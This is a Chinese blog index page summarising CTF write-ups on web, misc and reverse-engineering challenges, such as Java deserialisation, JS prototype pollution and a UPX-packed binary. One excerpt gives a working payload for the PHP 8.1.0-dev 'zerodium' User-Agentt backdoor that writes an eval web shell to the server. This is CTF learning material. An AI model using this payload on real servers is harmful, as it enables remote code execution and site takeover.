EddieMurphy-blogs

摘要： 四周的比赛，终于落下帷幕了。 学到不少东西，主要是审计代码这一方面吧，虽然第四周也没做出几个题呃呃，再接再厉吧大嗨阔！ 因为环境关了没来得及复现，网上其他师傅也没复现，只能看官方wp硬写了。 i-short-you-1 一眼java反序列化写poc，但做出来的人就几个，这就是java反序列化的魅力吧 阅读全文

摘要： WEB PHP的后门 bp抓包发现版本为8.0.1，网上搜到poc: PHP 8.1.0-dev后门复现-CSDN博客 直接 User-Agentt: zerodiumfile_put_contents('indexs111.php','<?php eval($_POST["cmd"]);?>'); 阅读全文

摘要： 三道web，搓出来两道，还是可以了哈哈哈哈哈~~~ 直接长话短说。 WebVPN js原型链污染。 首先审计源码，index看到个登录路由： 重点就是app.js： const express = require("express"); const axios = require("axios"); 阅读全文

摘要： 不务正业web手，在线打misc娱乐娱乐哈哈哈哈哈，虽然好多都也是零基础现学或者复现的。 WEEK1 签到不说了，signin从手机充电口看。 simple_attack 下载下来拿到个图片和压缩包， 而且压缩包里面的图片跟外面的图片名字是一样的： 直接猜是明文攻击： 将图片进行压缩(使用bandz 阅读全文

摘要： Checkin 简单的js，没有混淆，源码里找到可疑十六进制字符串，在控制台直接console.log()就出了。 CutePath 有点搞。 网上搜到的Cutehttpserver CVE是XSS，但是这个CVE是v1.x和v2.x的，所以应该用不了。 这里卡住了，点联系进入项目官网，然后进git 阅读全文

摘要： 除了java那道和XSS那道，其他挺简单。 What the cow say? 直接可以命令注入，发现flag字符被ban了，但不能直接注入，包裹反引号直接RCE： 一条龙： Select More Courses 进去后提示弱密码，但是一直找不到对的，dirsearch也搜不到： 还以为方向错了， 阅读全文

摘要： 难度大体也还是简单，但是有些题还是有水平的。 POPgadget 逆天签到题。 自己看源码就知道我为啥这么说了： <?php highlight_file(__FILE__); class Fun{ private $func = 'call_user_func_array'; public fun 阅读全文

摘要： 没想到Re比web还简单呃呃： ezIDA IDA打开就看到了。 ezASM 丢chatgpt就出了。 ezUPX 先拿去upx脱个壳，然后IDA打开找到加密算法，就是个简单的异或，exp: ida_chars = [ 0x64, 0x7B, 0x76, 0x73, 0x60, 0x49, 0x65 阅读全文

摘要： 第一周算是入门难度，还是很简单的，直接上哥们的wp： ezHTTP 入门级别的几个http点，注意一下后面用X-Real-IP就行。 Bypass it 注册是post发包，说是不让你注册，查看源码看到个register.php，直接对这个发包，注册成功然后登录就出了。 Select Courses 阅读全文

摘要： 期末考完了，芜湖~~~~复工！ NCTF好巧不巧出在我们期末周复习的时间，当时也只是上线看了一点，有些题有点思路，但是还是因为积累知识不足，想不出什么姿势。 现在能复现出的就尽量看看吧。 logging 记忆犹新，因为队里一个佬来了一看，说是一眼签到题，哈哈哈哈哈哈。 Java安全以前没怎么接触过， 阅读全文